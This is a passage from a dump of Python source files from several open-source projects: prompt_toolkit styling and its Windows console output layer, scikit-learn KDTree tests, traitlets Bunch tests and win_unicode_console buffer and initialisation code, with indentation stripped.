pm.add_hookspecs(HookSpec)
for i in range(plugins):
pm.register(Plugin(i), name=f"plug_{i}")
for i in range(wrappers):
pm.register(PluginWrap(i), name=f"wrap_plug_{i}")
benchmark(pm.hook.fun, hooks=pm.hook, nesting=nesting)
```
#### File: prompt_toolkit/styles/from_dict.py
```python
try:
from collections.abc import Mapping
except ImportError:
from collections import Mapping
from .base import Style, DEFAULT_ATTRS, ANSI_COLOR_NAMES
from .defaults import DEFAULT_STYLE_EXTENSIONS
from .utils import merge_attrs, split_token_in_parts
from six.moves import range
__all__ = (
'style_from_dict',
)
def _colorformat(text):
"""
Parse/validate color format.
Like in Pygments, but also support the ANSI color names.
(These will map to the colors of the 16 color palette.)
"""
if text[0:1] == '#':
col = text[1:]
if col in ANSI_COLOR_NAMES:
return col
elif len(col) == 6:
return col
elif len(col) == 3:
return col[0]*2 + col[1]*2 + col[2]*2
elif text == '':
return text
raise ValueError('Wrong color format %r' % text)
def style_from_dict(style_dict, include_defaults=True):
"""
Create a ``Style`` instance from a dictionary or other mapping.
The dictionary is equivalent to the ``Style.styles`` dictionary from
pygments, with a few additions: it supports 'reverse' and 'blink'.
Usage::
style_from_dict({
Token: '#ff0000 bold underline',
Token.Title: 'blink',
Token.SomethingElse: 'reverse',
})
:param include_defaults: Include the defaults (built-in) styling for
selected text, etc...)
"""
assert isinstance(style_dict, Mapping)
if include_defaults:
s2 = {}
s2.update(DEFAULT_STYLE_EXTENSIONS)
s2.update(style_dict)
style_dict = s2
# Expand token inheritance and turn style description into Attrs.
token_to_attrs = {}
# (Loop through the tokens in order. Sorting makes sure that
# we process the parent first.)
for ttype, styledef in sorted(style_dict.items()):
# Start from parent Attrs or default Attrs.
attrs = DEFAULT_ATTRS
if 'noinherit' not in styledef:
for i in range(1, len(ttype) + 1):
try:
attrs = token_to_attrs[ttype[:-i]]
except KeyError:
pass
else:
break
# Now update with the given attributes.
for part in styledef.split():
if part == 'noinherit':
pass
elif part == 'bold':
attrs = attrs._replace(bold=True)
elif part == 'nobold':
attrs = attrs._replace(bold=False)
elif part == 'italic':
attrs = attrs._replace(italic=True)
elif part == 'noitalic':
attrs = attrs._replace(italic=False)
elif part == 'underline':
attrs = attrs._replace(underline=True)
elif part == 'nounderline':
attrs = attrs._replace(underline=False)
# prompt_toolkit extensions. Not in Pygments.
elif part == 'blink':
attrs = attrs._replace(blink=True)
elif part == 'noblink':
attrs = attrs._replace(blink=False)
elif part == 'reverse':
attrs = attrs._replace(reverse=True)
elif part == 'noreverse':
attrs = attrs._replace(reverse=False)
# Pygments properties that we ignore.
elif part in ('roman', 'sans', 'mono'):
pass
elif part.startswith('border:'):
pass
# Colors.
elif part.startswith('bg:'):
attrs = attrs._replace(bgcolor=_colorformat(part[3:]))
else:
attrs = attrs._replace(color=_colorformat(part))
token_to_attrs[ttype] = attrs
return _StyleFromDict(token_to_attrs)
class _StyleFromDict(Style):
"""
Turn a dictionary that maps `Token` to `Attrs` into a style class.
:param token_to_attrs: Dictionary that maps `Token` to `Attrs`.
"""
def __init__(self, token_to_attrs):
self.token_to_attrs = token_to_attrs
def get_attrs_for_token(self, token):
# Split Token.
list_of_attrs = []
for token in split_token_in_parts(token):
list_of_attrs.append(self.token_to_attrs.get(token, DEFAULT_ATTRS))
return merge_attrs(list_of_attrs)
def invalidation_hash(self):
return id(self.token_to_attrs)
```
#### File: prompt_toolkit/terminal/win32_output.py
```python
from __future__ import unicode_literals
from ctypes import windll, byref, ArgumentError, c_char, c_long, c_ulong, c_uint, pointer
from ctypes.wintypes import DWORD, HANDLE
from prompt_toolkit.renderer import Output
from prompt_toolkit.styles import ANSI_COLOR_NAMES
from prompt_toolkit.win32_types import CONSOLE_SCREEN_BUFFER_INFO, STD_OUTPUT_HANDLE, STD_INPUT_HANDLE, COORD, SMALL_RECT
import os
import six
__all__ = (
'Win32Output',
)
def _coord_byval(coord):
"""
Turns a COORD object into a c_long.
This will cause it to be passed by value instead of by reference. (That is what I think at least.)
When runing ``ptipython`` is run (only with IPython), we often got the following error::
Error in 'SetConsoleCursorPosition'.
ArgumentError("argument 2: <class 'TypeError'>: wrong type",)
argument 2: <class 'TypeError'>: wrong type
It was solved by turning ``COORD`` parameters into a ``c_long`` like this.
More info: http://msdn.microsoft.com/en-us/library/windows/desktop/ms686025(v=vs.85).aspx
"""
return c_long(coord.Y * 0x10000 | coord.X & 0xFFFF)
#: If True: write the output of the renderer also to the following file. This
#: is very useful for debugging. (e.g.: to see that we don't write more bytes
#: than required.)
_DEBUG_RENDER_OUTPUT = False
_DEBUG_RENDER_OUTPUT_FILENAME = r'prompt-toolkit-windows-output.log'
class NoConsoleScreenBufferError(Exception):
"""
Raised when the application is not running inside a Windows Console, but
the user tries to instantiate Win32Output.
"""
def __init__(self):
# Are we running in 'xterm' on Windows, like git-bash for instance?
xterm = 'xterm' in os.environ.get('TERM', '')
if xterm:
message = ('Found %s, while expecting a Windows console. '
'Maybe try to run this program using "winpty" '
'or run it in cmd.exe instead. Or otherwise, '
'in case of Cygwin, use the Python executable '
'that is compiled for Cygwin.' % os.environ['TERM'])
else:
message = 'No Windows console found. Are you running cmd.exe?'
super(NoConsoleScreenBufferError, self).__init__(message)
class Win32Output(Output):
"""
I/O abstraction for rendering to Windows consoles.
(cmd.exe and similar.)
"""
def __init__(self, stdout, use_complete_width=False):
self.use_complete_width = use_complete_width
self._buffer = []
self.stdout = stdout
self.hconsole = HANDLE(windll.kernel32.GetStdHandle(STD_OUTPUT_HANDLE))
self._in_alternate_screen = False
self.color_lookup_table = ColorLookupTable()
# Remember the default console colors.
info = self.get_win32_screen_buffer_info()
self.default_attrs = info.wAttributes if info else 15
if _DEBUG_RENDER_OUTPUT:
self.LOG = open(_DEBUG_RENDER_OUTPUT_FILENAME, 'ab')
def fileno(self):
" Return file descriptor. "
return self.stdout.fileno()
def encoding(self):
" Return encoding used for stdout. "
return self.stdout.encoding
def write(self, data):
self._buffer.append(data)
def write_raw(self, data):
" For win32, there is no difference between write and write_raw. "
self.write(data)
def get_size(self):
from prompt_toolkit.layout.screen import Size
info = self.get_win32_screen_buffer_info()
# We take the width of the *visible* region as the size. Not the width
# of the complete screen buffer. (Unless use_complete_width has been
# set.)
if self.use_complete_width:
width = info.dwSize.X
else:
width = info.srWindow.Right - info.srWindow.Left
height = info.srWindow.Bottom - info.srWindow.Top + 1
# We avoid the right margin, windows will wrap otherwise.
maxwidth = info.dwSize.X - 1
width = min(maxwidth, width)
# Create `Size` object.
return Size(rows=height, columns=width)
def _winapi(self, func, *a, **kw):
"""
Flush and call win API function.
"""
self.flush()
if _DEBUG_RENDER_OUTPUT:
self.LOG.write(('%r' % func.__name__).encode('utf-8') + b'\n')
self.LOG.write(b' ' + ', '.join(['%r' % i for i in a]).encode('utf-8') + b'\n')
self.LOG.write(b' ' + ', '.join(['%r' % type(i) for i in a]).encode('utf-8') + b'\n')
self.LOG.flush()
try:
return func(*a, **kw)
except ArgumentError as e:
if _DEBUG_RENDER_OUTPUT:
self.LOG.write((' Error in %r %r %s\n' % (func.__name__, e, e)).encode('utf-8'))
def get_win32_screen_buffer_info(self):
"""
Return Screen buffer info.
"""
# NOTE: We don't call the `GetConsoleScreenBufferInfo` API through
# `self._winapi`. Doing so causes Python to crash on certain 64bit
# Python versions. (Reproduced with 64bit Python 2.7.6, on Windows
# 10). It is not clear why. Possibly, it has to do with passing
# these objects as an argument, or through *args.
# The Python documentation contains the following - possibly related - warning:
# ctypes does not support passing unions or structures with
# bit-fields to functions by value. While this may work on 32-bit
# x86, it's not guaranteed by the library to work in the general
# case. Unions and structures with bit-fields should always be
# passed to functions by pointer.
# Also see:
# - https://github.com/ipython/ipython/issues/10070
# - https://github.com/jonathanslenders/python-prompt-toolkit/issues/406
# - https://github.com/jonathanslenders/python-prompt-toolkit/issues/86
self.flush()
sbinfo = CONSOLE_SCREEN_BUFFER_INFO()
success = windll.kernel32.GetConsoleScreenBufferInfo(self.hconsole, byref(sbinfo))
# success = self._winapi(windll.kernel32.GetConsoleScreenBufferInfo,
# self.hconsole, byref(sbinfo))
if success:
return sbinfo
else:
raise NoConsoleScreenBufferError
def set_title(self, title):
"""
Set terminal title.
"""
assert isinstance(title, six.text_type)
self._winapi(windll.kernel32.SetConsoleTitleW, title)
def clear_title(self):
self._winapi(windll.kernel32.SetConsoleTitleW, '')
def erase_screen(self):
start = COORD(0, 0)
sbinfo = self.get_win32_screen_buffer_info()
length = sbinfo.dwSize.X * sbinfo.dwSize.Y
self.cursor_goto(row=0, column=0)
self._erase(start, length)
def erase_down(self):
sbinfo = self.get_win32_screen_buffer_info()
size = sbinfo.dwSize
start = sbinfo.dwCursorPosition
length = ((size.X - size.X) + size.X * (size.Y - sbinfo.dwCursorPosition.Y))
self._erase(start, length)
def erase_end_of_line(self):
"""
"""
sbinfo = self.get_win32_screen_buffer_info()
start = sbinfo.dwCursorPosition
length = sbinfo.dwSize.X - sbinfo.dwCursorPosition.X
self._erase(start, length)
def _erase(self, start, length):
chars_written = c_ulong()
self._winapi(windll.kernel32.FillConsoleOutputCharacterA,
self.hconsole, c_char(b' '), DWORD(length), _coord_byval(start),
byref(chars_written))
# Reset attributes.
sbinfo = self.get_win32_screen_buffer_info()
self._winapi(windll.kernel32.FillConsoleOutputAttribute,
self.hconsole, sbinfo.wAttributes, length, _coord_byval(start),
byref(chars_written))
def reset_attributes(self):
" Reset the console foreground/background color. "
self._winapi(windll.kernel32.SetConsoleTextAttribute, self.hconsole,
self.default_attrs)
def set_attributes(self, attrs):
fgcolor, bgcolor, bold, underline, italic, blink, reverse = attrs
# Start from the default attributes.
attrs = self.default_attrs
# Override the last four bits: foreground color.
if fgcolor is not None:
attrs = attrs & ~0xf
attrs |= self.color_lookup_table.lookup_fg_color(fgcolor)
# Override the next four bits: background color.
if bgcolor is not None:
attrs = attrs & ~0xf0
attrs |= self.color_lookup_table.lookup_bg_color(bgcolor)
# Reverse: swap these four bits groups.
if reverse:
attrs = (attrs & ~0xff) | ((attrs & 0xf) << 4) | ((attrs & 0xf0) >> 4)
self._winapi(windll.kernel32.SetConsoleTextAttribute, self.hconsole, attrs)
def disable_autowrap(self):
# Not supported by Windows.
pass
def enable_autowrap(self):
# Not supported by Windows.
pass
def cursor_goto(self, row=0, column=0):
pos = COORD(x=column, y=row)
self._winapi(windll.kernel32.SetConsoleCursorPosition, self.hconsole, _coord_byval(pos))
def cursor_up(self, amount):
sr = self.get_win32_screen_buffer_info().dwCursorPosition
pos = COORD(sr.X, sr.Y - amount)
self._winapi(windll.kernel32.SetConsoleCursorPosition, self.hconsole, _coord_byval(pos))
def cursor_down(self, amount):
self.cursor_up(-amount)
def cursor_forward(self, amount):
sr = self.get_win32_screen_buffer_info().dwCursorPosition
# assert sr.X + amount >= 0, 'Negative cursor position: x=%r amount=%r' % (sr.X, amount)
pos = COORD(max(0, sr.X + amount), sr.Y)
self._winapi(windll.kernel32.SetConsoleCursorPosition, self.hconsole, _coord_byval(pos))
def cursor_backward(self, amount):
self.cursor_forward(-amount)
def flush(self):
"""
Write to output stream and flush.
"""
if not self._buffer:
# Only flush stdout buffer. (It could be that Python still has
# something in its buffer. -- We want to be sure to print that in
# the correct color.)
self.stdout.flush()
return
data = ''.join(self._buffer)
if _DEBUG_RENDER_OUTPUT:
self.LOG.write(('%r' % data).encode('utf-8') + b'\n')
self.LOG.flush()
# Print characters one by one. This appears to be the best soluton
# in oder to avoid traces of vertical lines when the completion
# menu disappears.
for b in data:
written = DWORD()
retval = windll.kernel32.WriteConsoleW(self.hconsole, b, 1, byref(written), None)
assert retval != 0
self._buffer = []
def get_rows_below_cursor_position(self):
info = self.get_win32_screen_buffer_info()
return info.srWindow.Bottom - info.dwCursorPosition.Y + 1
def scroll_buffer_to_prompt(self):
"""
To be called before drawing the prompt. This should scroll the console
to left, with the cursor at the bottom (if possible).
"""
# Get current window size
info = self.get_win32_screen_buffer_info()
sr = info.srWindow
cursor_pos = info.dwCursorPosition
result = SMALL_RECT()
# Scroll to the left.
result.Left = 0
result.Right = sr.Right - sr.Left
# Scroll vertical
win_height = sr.Bottom - sr.Top
if 0 < sr.Bottom - cursor_pos.Y < win_height - 1:
# no vertical scroll if cursor already on the screen
result.Bottom = sr.Bottom
else:
result.Bottom = max(win_height, cursor_pos.Y)
result.Top = result.Bottom - win_height
# Scroll API
self._winapi(windll.kernel32.SetConsoleWindowInfo, self.hconsole, True, byref(result))
def enter_alternate_screen(self):
"""
Go to alternate screen buffer.
"""
if not self._in_alternate_screen:
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
# Create a new console buffer and activate that one.
handle = HANDLE(self._winapi(windll.kernel32.CreateConsoleScreenBuffer, GENERIC_READ|GENERIC_WRITE,
DWORD(0), None, DWORD(1), None))
self._winapi(windll.kernel32.SetConsoleActiveScreenBuffer, handle)
self.hconsole = handle
self._in_alternate_screen = True
def quit_alternate_screen(self):
"""
Make stdout again the active buffer.
"""
if self._in_alternate_screen:
stdout = HANDLE(self._winapi(windll.kernel32.GetStdHandle, STD_OUTPUT_HANDLE))
self._winapi(windll.kernel32.SetConsoleActiveScreenBuffer, stdout)
self._winapi(windll.kernel32.CloseHandle, self.hconsole)
self.hconsole = stdout
self._in_alternate_screen = False
def enable_mouse_support(self):
ENABLE_MOUSE_INPUT = 0x10
handle = HANDLE(windll.kernel32.GetStdHandle(STD_INPUT_HANDLE))
original_mode = DWORD()
self._winapi(windll.kernel32.GetConsoleMode, handle, pointer(original_mode))
self._winapi(windll.kernel32.SetConsoleMode, handle, original_mode.value | ENABLE_MOUSE_INPUT)
def disable_mouse_support(self):
ENABLE_MOUSE_INPUT = 0x10
handle = HANDLE(windll.kernel32.GetStdHandle(STD_INPUT_HANDLE))
original_mode = DWORD()
self._winapi(windll.kernel32.GetConsoleMode, handle, pointer(original_mode))
self._winapi(windll.kernel32.SetConsoleMode, handle, original_mode.value & ~ ENABLE_MOUSE_INPUT)
def hide_cursor(self):
pass
def show_cursor(self):
pass
@classmethod
def win32_refresh_window(cls):
"""
Call win32 API to refresh the whole Window.
This is sometimes necessary when the application paints background
for completion menus. When the menu disappears, it leaves traces due
to a bug in the Windows Console. Sending a repaint request solves it.
"""
# Get console handle
handle = HANDLE(windll.kernel32.GetConsoleWindow())
RDW_INVALIDATE = 0x0001
windll.user32.RedrawWindow(handle, None, None, c_uint(RDW_INVALIDATE))
class FOREGROUND_COLOR:
BLACK = 0x0000
BLUE = 0x0001
GREEN = 0x0002
CYAN = 0x0003
RED = 0x0004
MAGENTA = 0x0005
YELLOW = 0x0006
GRAY = 0x0007
INTENSITY = 0x0008 # Foreground color is intensified.
class BACKROUND_COLOR:
BLACK = 0x0000
BLUE = 0x0010
GREEN = 0x0020
CYAN = 0x0030
RED = 0x0040
MAGENTA = 0x0050
YELLOW = 0x0060
GRAY = 0x0070
INTENSITY = 0x0080 # Background color is intensified.
def _create_ansi_color_dict(color_cls):
" Create a table that maps the 16 named ansi colors to their Windows code. "
return {
'ansidefault': color_cls.BLACK,
'ansiblack': color_cls.BLACK,
'ansidarkgray': color_cls.BLACK | color_cls.INTENSITY,
'ansilightgray': color_cls.GRAY,
'ansiwhite': color_cls.GRAY | color_cls.INTENSITY,
# Low intensity.
'ansidarkred': color_cls.RED,
'ansidarkgreen': color_cls.GREEN,
'ansibrown': color_cls.YELLOW,
'ansidarkblue': color_cls.BLUE,
'ansipurple': color_cls.MAGENTA,
'ansiteal': color_cls.CYAN,
# High intensity.
'ansired': color_cls.RED | color_cls.INTENSITY,
'ansigreen': color_cls.GREEN | color_cls.INTENSITY,
'ansiyellow': color_cls.YELLOW | color_cls.INTENSITY,
'ansiblue': color_cls.BLUE | color_cls.INTENSITY,
'ansifuchsia': color_cls.MAGENTA | color_cls.INTENSITY,
'ansiturquoise': color_cls.CYAN | color_cls.INTENSITY,
}
FG_ANSI_COLORS = _create_ansi_color_dict(FOREGROUND_COLOR)
BG_ANSI_COLORS = _create_ansi_color_dict(BACKROUND_COLOR)
assert set(FG_ANSI_COLORS) == set(ANSI_COLOR_NAMES)
assert set(BG_ANSI_COLORS) == set(ANSI_COLOR_NAMES)
class ColorLookupTable(object):
"""
Inspired by pygments/formatters/terminal256.py
"""
def __init__(self):
self._win32_colors = self._build_color_table()
self.best_match = {} # Cache
@staticmethod
def _build_color_table():
"""
Build an RGB-to-256 color conversion table
"""
FG = FOREGROUND_COLOR
BG = BACKROUND_COLOR
return [
(0x00, 0x00, 0x00, FG.BLACK, BG.BLACK),
(0x00, 0x00, 0xaa, FG.BLUE, BG.BLUE),
(0x00, 0xaa, 0x00, FG.GREEN, BG.GREEN),
(0x00, 0xaa, 0xaa, FG.CYAN, BG.CYAN),
(0xaa, 0x00, 0x00, FG.RED, BG.RED),
(0xaa, 0x00, 0xaa, FG.MAGENTA, BG.MAGENTA),
(0xaa, 0xaa, 0x00, FG.YELLOW, BG.YELLOW),
(0x88, 0x88, 0x88, FG.GRAY, BG.GRAY),
(0x44, 0x44, 0xff, FG.BLUE | FG.INTENSITY, BG.BLUE | BG.INTENSITY),
(0x44, 0xff, 0x44, FG.GREEN | FG.INTENSITY, BG.GREEN | BG.INTENSITY),
(0x44, 0xff, 0xff, FG.CYAN | FG.INTENSITY, BG.CYAN | BG.INTENSITY),
(0xff, 0x44, 0x44, FG.RED | FG.INTENSITY, BG.RED | BG.INTENSITY),
(0xff, 0x44, 0xff, FG.MAGENTA | FG.INTENSITY, BG.MAGENTA | BG.INTENSITY),
(0xff, 0xff, 0x44, FG.YELLOW | FG.INTENSITY, BG.YELLOW | BG.INTENSITY),
(0x44, 0x44, 0x44, FG.BLACK | FG.INTENSITY, BG.BLACK | BG.INTENSITY),
(0xff, 0xff, 0xff, FG.GRAY | FG.INTENSITY, BG.GRAY | BG.INTENSITY),
]
def _closest_color(self, r, g, b):
distance = 257 * 257 * 3 # "infinity" (>distance from #000000 to #ffffff)
fg_match = 0
bg_match = 0
for r_, g_, b_, fg_, bg_ in self._win32_colors:
rd = r - r_
gd = g - g_
bd = b - b_
d = rd * rd + gd * gd + bd * bd
if d < distance:
fg_match = fg_
bg_match = bg_
distance = d
return fg_match, bg_match
def _color_indexes(self, color):
indexes = self.best_match.get(color, None)
if indexes is None:
try:
rgb = int(str(color), 16)
except ValueError:
rgb = 0
r = (rgb >> 16) & 0xff
g = (rgb >> 8) & 0xff
b = rgb & 0xff
indexes = self._closest_color(r, g, b)
self.best_match[color] = indexes
return indexes
def lookup_fg_color(self, fg_color):
"""
Return the color for use in the
`windll.kernel32.SetConsoleTextAttribute` API call.
:param fg_color: Foreground as text. E.g. 'ffffff' or 'red'
"""
# Foreground.
if fg_color in FG_ANSI_COLORS:
return FG_ANSI_COLORS[fg_color]
else:
return self._color_indexes(fg_color)[0]
def lookup_bg_color(self, bg_color):
"""
Return the color for use in the
`windll.kernel32.SetConsoleTextAttribute` API call.
:param bg_color: Background as text. E.g. 'ffffff' or 'red'
"""
# Background.
if bg_color in BG_ANSI_COLORS:
return BG_ANSI_COLORS[bg_color]
else:
return self._color_indexes(bg_color)[1]
```
#### File: py2/tests/test_print_tokens.py
```python
from __future__ import unicode_literals
from prompt_toolkit.shortcuts import print_tokens
from prompt_toolkit.token import Token
from prompt_toolkit.styles import style_from_dict
class _Capture:
" Emulate an stdout object. "
encoding = 'utf-8'
def __init__(self):
self._data = []
def write(self, data):
self._data.append(data)
@property
def data(self):
return b''.join(self._data)
def flush(self):
pass
def isatty(self):
return True
def test_print_tokens():
f = _Capture()
print_tokens([(Token, 'hello'), (Token, 'world')], file=f)
assert b'hello' in f.data
assert b'world' in f.data
def test_with_style():
f = _Capture()
style = style_from_dict({
Token.Hello: '#ff0066',
Token.World: '#44ff44 italic',
})
tokens = [
(Token.Hello, 'Hello '),
(Token.World, 'world'),
]
print_tokens(tokens, style=style, file=f)
assert b'\x1b[0;38;5;197mHello' in f.data
assert b'\x1b[0;38;5;83;3mworld' in f.data
```
#### File: neighbors/tests/test_kd_tree.py
```python
import numpy as np
from numpy.testing import assert_array_almost_equal
from sklearn.neighbors.kd_tree import (KDTree, NeighborsHeap,
simultaneous_sort, kernel_norm,
nodeheap_sort, DTYPE, ITYPE)
from sklearn.neighbors.dist_metrics import DistanceMetric
from sklearn.utils.testing import SkipTest, assert_allclose
V = np.random.random((3, 3))
V = np.dot(V, V.T)
DIMENSION = 3
METRICS = {'euclidean': {},
'manhattan': {},
'chebyshev': {},
'minkowski': dict(p=3)}
def brute_force_neighbors(X, Y, k, metric, **kwargs):
D = DistanceMetric.get_metric(metric, **kwargs).pairwise(Y, X)
ind = np.argsort(D, axis=1)[:, :k]
dist = D[np.arange(Y.shape[0])[:, None], ind]
return dist, ind
def test_kd_tree_query():
np.random.seed(0)
X = np.random.random((40, DIMENSION))
Y = np.random.random((10, DIMENSION))
def check_neighbors(dualtree, breadth_first, k, metric, kwargs):
kdt = KDTree(X, leaf_size=1, metric=metric, **kwargs)
dist1, ind1 = kdt.query(Y, k, dualtree=dualtree,
breadth_first=breadth_first)
dist2, ind2 = brute_force_neighbors(X, Y, k, metric, **kwargs)
# don't check indices here: if there are any duplicate distances,
# the indices may not match. Distances should not have this problem.
assert_array_almost_equal(dist1, dist2)
for (metric, kwargs) in METRICS.items():
for k in (1, 3, 5):
for dualtree in (True, False):
for breadth_first in (True, False):
yield (check_neighbors,
dualtree, breadth_first,
k, metric, kwargs)
def test_kd_tree_query_radius(n_samples=100, n_features=10):
np.random.seed(0)
X = 2 * np.random.random(size=(n_samples, n_features)) - 1
query_pt = np.zeros(n_features, dtype=float)
eps = 1E-15 # roundoff error can cause test to fail
kdt = KDTree(X, leaf_size=5)
rad = np.sqrt(((X - query_pt) ** 2).sum(1))
for r in np.linspace(rad[0], rad[-1], 100):
ind = kdt.query_radius([query_pt], r + eps)[0]
i = np.where(rad <= r + eps)[0]
ind.sort()
i.sort()
assert_array_almost_equal(i, ind)
def test_kd_tree_query_radius_distance(n_samples=100, n_features=10):
np.random.seed(0)
X = 2 * np.random.random(size=(n_samples, n_features)) - 1
query_pt = np.zeros(n_features, dtype=float)
eps = 1E-15 # roundoff error can cause test to fail
kdt = KDTree(X, leaf_size=5)
rad = np.sqrt(((X - query_pt) ** 2).sum(1))
for r in np.linspace(rad[0], rad[-1], 100):
ind, dist = kdt.query_radius([query_pt], r + eps, return_distance=True)
ind = ind[0]
dist = dist[0]
d = np.sqrt(((query_pt - X[ind]) ** 2).sum(1))
assert_array_almost_equal(d, dist)
def compute_kernel_slow(Y, X, kernel, h):
d = np.sqrt(((Y[:, None, :] - X) ** 2).sum(-1))
norm = kernel_norm(h, X.shape[1], kernel)
if kernel == 'gaussian':
return norm * np.exp(-0.5 * (d * d) / (h * h)).sum(-1)
elif kernel == 'tophat':
return norm * (d < h).sum(-1)
elif kernel == 'epanechnikov':
return norm * ((1.0 - (d * d) / (h * h)) * (d < h)).sum(-1)
elif kernel == 'exponential':
return norm * (np.exp(-d / h)).sum(-1)
elif kernel == 'linear':
return norm * ((1 - d / h) * (d < h)).sum(-1)
elif kernel == 'cosine':
return norm * (np.cos(0.5 * np.pi * d / h) * (d < h)).sum(-1)
else:
raise ValueError('kernel not recognized')
def test_kd_tree_kde(n_samples=100, n_features=3):
np.random.seed(0)
X = np.random.random((n_samples, n_features))
Y = np.random.random((n_samples, n_features))
kdt = KDTree(X, leaf_size=10)
for kernel in ['gaussian', 'tophat', 'epanechnikov',
'exponential', 'linear', 'cosine']:
for h in [0.01, 0.1, 1]:
dens_true = compute_kernel_slow(Y, X, kernel, h)
def check_results(kernel, h, atol, rtol, breadth_first):
dens = kdt.kernel_density(Y, h, atol=atol, rtol=rtol,
kernel=kernel,
breadth_first=breadth_first)
assert_allclose(dens, dens_true, atol=atol,
rtol=max(rtol, 1e-7))
for rtol in [0, 1E-5]:
for atol in [1E-6, 1E-2]:
for breadth_first in (True, False):
yield (check_results, kernel, h, atol, rtol,
breadth_first)
import pytest
@pytest.mark.xfail
def test_gaussian_kde(n_samples=1000):
# Compare gaussian KDE results to scipy.stats.gaussian_kde
from scipy.stats import gaussian_kde
np.random.seed(0)
x_in = np.random.normal(0, 1, n_samples)
x_out = np.linspace(-5, 5, 30)
for h in [0.01, 0.1, 1]:
kdt = KDTree(x_in[:, None])
try:
gkde = gaussian_kde(x_in, bw_method=h / np.std(x_in))
except TypeError:
raise SkipTest("Old scipy, does not accept explicit bandwidth.")
dens_kdt = kdt.kernel_density(x_out[:, None], h) / n_samples
dens_gkde = gkde.evaluate(x_out)
assert_array_almost_equal(dens_kdt, dens_gkde, decimal=3)
def test_kd_tree_two_point(n_samples=100, n_features=3):
np.random.seed(0)
X = np.random.random((n_samples, n_features))
Y = np.random.random((n_samples, n_features))
r = np.linspace(0, 1, 10)
kdt = KDTree(X, leaf_size=10)
D = DistanceMetric.get_metric("euclidean").pairwise(Y, X)
counts_true = [(D <= ri).sum() for ri in r]
def check_two_point(r, dualtree):
counts = kdt.two_point_correlation(Y, r=r, dualtree=dualtree)
assert_array_almost_equal(counts, counts_true)
for dualtree in (True, False):
yield check_two_point, r, dualtree
def test_kd_tree_pickle():
import pickle
np.random.seed(0)
X = np.random.random((10, 3))
kdt1 = KDTree(X, leaf_size=1)
ind1, dist1 = kdt1.query(X)
def check_pickle_protocol(protocol):
s = pickle.dumps(kdt1, protocol=protocol)
kdt2 = pickle.loads(s)
ind2, dist2 = kdt2.query(X)
assert_array_almost_equal(ind1, ind2)
assert_array_almost_equal(dist1, dist2)
for protocol in (0, 1, 2):
yield check_pickle_protocol, protocol
def test_neighbors_heap(n_pts=5, n_nbrs=10):
heap = NeighborsHeap(n_pts, n_nbrs)
for row in range(n_pts):
d_in = np.random.random(2 * n_nbrs).astype(DTYPE)
i_in = np.arange(2 * n_nbrs, dtype=ITYPE)
for d, i in zip(d_in, i_in):
heap.push(row, d, i)
ind = np.argsort(d_in)
d_in = d_in[ind]
i_in = i_in[ind]
d_heap, i_heap = heap.get_arrays(sort=True)
assert_array_almost_equal(d_in[:n_nbrs], d_heap[row])
assert_array_almost_equal(i_in[:n_nbrs], i_heap[row])
def test_node_heap(n_nodes=50):
vals = np.random.random(n_nodes).astype(DTYPE)
i1 = np.argsort(vals)
vals2, i2 = nodeheap_sort(vals)
assert_array_almost_equal(i1, i2)
assert_array_almost_equal(vals[i1], vals2)
def test_simultaneous_sort(n_rows=10, n_pts=201):
dist = np.random.random((n_rows, n_pts)).astype(DTYPE)
ind = (np.arange(n_pts) + np.zeros((n_rows, 1))).astype(ITYPE)
dist2 = dist.copy()
ind2 = ind.copy()
# simultaneous sort rows using function
simultaneous_sort(dist, ind)
# simultaneous sort rows using numpy
i = np.argsort(dist2, axis=1)
row_ind = np.arange(n_rows)[:, None]
dist2 = dist2[row_ind, i]
ind2 = ind2[row_ind, i]
assert_array_almost_equal(dist, dist2)
assert_array_almost_equal(ind, ind2)
```
#### File: utils/tests/test_bunch.py
```python
from traitlets.utils.bunch import Bunch
def test_bunch():
b = Bunch(x=5, y=10)
assert 'y' in b
assert 'x' in b
assert b.x == 5
b['a'] = 'hi'
assert b.a == 'hi'
def test_bunch_dir():
b = Bunch(x=5, y=10)
assert 'x' in dir(b)
assert 'keys' in dir(b)
```
#### File: win_unicode_console/win_unicode_console/buffer.py
```python
import ctypes
from ctypes import (byref, POINTER, pythonapi,
c_int, c_char, c_char_p, c_void_p, py_object, c_ssize_t)
from .info import PY2
c_ssize_p = POINTER(c_ssize_t)
PyObject_GetBuffer = pythonapi.PyObject_GetBuffer
PyBuffer_Release = pythonapi.PyBuffer_Release
PyBUF_SIMPLE = 0
PyBUF_WRITABLE = 1
class Py_buffer(ctypes.Structure):
_fields_ = [
("buf", c_void_p),
("obj", py_object),
("len", c_ssize_t),
("itemsize", c_ssize_t),
("readonly", c_int),
("ndim", c_int),
("format", c_char_p),
("shape", c_ssize_p),
("strides", c_ssize_p),
("suboffsets", c_ssize_p),
("internal", c_void_p)
]
if PY2:
_fields_.insert(-1, ("smalltable", c_ssize_t * 2))
@classmethod
def get_from(cls, obj, flags=PyBUF_SIMPLE):
buf = cls()
PyObject_GetBuffer(py_object(obj), byref(buf), flags)
return buf
def release(self):
PyBuffer_Release(byref(self))
def get_buffer(obj, writable=False):
buf = Py_buffer.get_from(obj, PyBUF_WRITABLE if writable else PyBUF_SIMPLE)
try:
buffer_type = c_char * buf.len
return buffer_type.from_address(buf.buf)
finally:
buf.release()
```
#### File: win_unicode_console/win_unicode_console/__init__.py
```python
from . import streams, console #, readline_hook
from .info import WINDOWS, PY2
if PY2:
from . import raw_input
if PY2 and WINDOWS:
from . import unicode_argv
# PY3 # def enable(*,
def enable(
stdin = Ellipsis,
stdout = Ellipsis,
stderr = Ellipsis,
use_readline_hook = False,
use_pyreadline = True,
use_raw_input = True, # PY2
raw_input__return_unicode = raw_input.RETURN_UNICODE if PY2 else None,
use_unicode_argv = False, # PY2, has some issues
use_repl = False#,
):
if not WINDOWS:
return
streams.enable(stdin=stdin, stdout=stdout, stderr=stderr)
#if use_readline_hook:
# readline_hook.enable(use_pyreadline=use_pyreadline)
if PY2 and use_raw_input:
raw_input.enable(raw_input__return_unicode)
if PY2 and use_unicode_argv:
unicode_argv.enable()
if use_repl:
console.enable()
def disable():
if not WINDOWS:
return
if console.running_console is not None:
console.disable()
if PY2:
unicode_argv.disable()
raw_input.disable()
#readline_hook.disable()
streams.disable()
```
#### File: win_unicode_console/win_unicode_console/readline_hook.py
```python
from __future__ import print_function # PY2
import sys
import traceback
import warnings
import ctypes.util
from ctypes import (pythonapi, cdll, cast,
c_char_p, c_void_p, c_size_t, CFUNCTYPE)
from .info import WINDOWS
try:
import pyreadline
except ImportError:
pyreadline = None
